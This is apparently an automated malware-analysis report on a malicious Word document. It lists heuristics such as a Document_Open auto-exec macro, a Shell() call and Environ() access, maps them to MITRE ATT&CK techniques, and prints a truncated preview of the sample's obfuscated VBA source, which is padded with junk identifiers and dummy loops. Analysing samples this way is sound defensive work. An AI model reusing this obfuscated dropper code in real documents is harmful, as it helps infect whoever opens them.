MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro. The 'Document_Open' macro is present and utilizes a Shell() call, indicating an attempt to execute external commands. This is strongly suggestive of a downloader or droppper functionality, where the macro's primary purpose is to fetch and execute a secondary payload. The presence of the 'Shell()' call and the auto-execution of the 'Document_Open' macro are critical indicators.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23650 bytes |
SHA-256: ba6a0244f453dd7e5d5c09b89033c6ae545884e358b4be970a388835b16b2f69 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private snortsovertonessects(0 To 58) As Byte Dim desertionsbicycleyachts As Long Dim frighttwinkleinoculated As String Dim cohabitationhumanitytreatises As Long Private indeterminatedithersBlancas As Boolean Dim underliningoversimplificationsElmers As Long Private overproducingmouthfulsunknowing(0 To 930) As Byte Private repackagingfluffinessstransliterate(0 To 912) As Byte Function tinyscratchiestexpounding(auditoriaconversationalistspulps As String, undesirablemoodinesssGunther As Integer, privationslibcarryall As String) As String Dim wellsswivelingseverances As String Dim Todsbacchanalianscolonization As Integer Dim timingsPortlandsholing As String Dim yesteryearsAquinassmilled As Boolean Dim chewergroinpigtails As Integer Dim mountebanksmeagerlyreviewers As String Dim enjoyscollierslibelling As String Dim Heisenbergwitchingcolliers As Boolean Dim SheratonsCamelotenhancements As Boolean Dim nuisancesquadruplingordinarily As String Dim damningKaylaArizonian As String nuisancesquadruplingordinarily = anorexicszwiebacksflue(auditoriaconversationalistspulps, undesirablemoodinesssGunther) Dim unhesitatinglydewdropspawls As Integer unhesitatinglydewdropspawls = 934 Do While 7089 > unhesitatinglydewdropspawls unhesitatinglydewdropspawls = unhesitatinglydewdropspawls + 23 Loop damningKaylaArizonian = reconsideringovercastsponytail(undesirablemoodinesssGunther, privationslibcarryall) Close #undesirablemoodinesssGunther End Function Function expoundingwolframMohican() Dim pollinatesluminouslyballast As Boolean pollinatesluminouslyballast = transmitterstruantsrating(grenadesongcrouchs) End Function Public Function pollinatesrechargesystematizing() As Integer Dim reckonmadcapspresidents As String Dim Thvideotapingunhesitating As String Dim Aristophanesspresidentsskydivers As String Dim greatnesseightyssubtotaled As Integer Dim plaidtunnelingsmarginalias As Boolean Dim dateresistorsdownloaded As String Dim reconsideringinfertilitywhacking As String Dim irritatesLevypelicans As String Dim Juniorcrabbiestfreebooters As Boolean Dim progressivessuburbanitesalutations As Boolean Dim noondayshinyroundly As Integer Dim terrainsyachtsKoran As Integer Dim hideousnessconfidenceintrusted As String Dim ferociouslyjoistsutter As Integer ferociouslyjoistsutter = 1695 Do While 6552 > ferociouslyjoistsutter ferociouslyjoistsutter = ferociouslyjoistsutter + 22 Loop pollinatesrechargesystematizing = FreeFile End Function Public Function victualingSoutheySARS(liefconjoiningunisexs As String) As String Dim thensRamirosbrainwashing As Integer Dim bansheedeedfluoresce As String Dim constructorsrevaluedgoo As String Dim posersdomesticsmoratoriums As String Dim fiddlejollysplausibly As Integer Dim pollinateswearisomeexcitable As Integer Dim dentistsgardenobtusest As Integer Dim abbotochresGiselle As Integer Dim biasesbombshellquestioned As String Dim unknowingdetectingBaxter As String Dim predisposesHardyLiszt As String Dim cruciblesbulbousNirenberg As Boolean Dim Josefserialsintoxicants As String Dim appertainedunreachableascertain As Integer Dim underwritelegionfealty As Integer Dim embroideryshithertopredisposes As Integer embroideryshithertopredisposes = 3185 Do While embroideryshithertopredisposes < 6577 embroideryshithertopredisposes = embroideryshithertopredisposes + 3 Loop victualingSoutheySARS = Environ(liefconjoiningunisexs) End Function Public Function spellinghuhtoddlers(Mingussrobotfingernails As Integer, warrantyingAmerindsdeclared As String) Dim falsettosfliesinlays As Integer Dim sniggeringErasmusepidemics As String Dim remarriesagreeablypealing As Boolean Dim vetchfertilizersdragonflies As Integer Dim Weldonsastrakhanported As Boolean Dim polkaingHannibalstampede As I ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.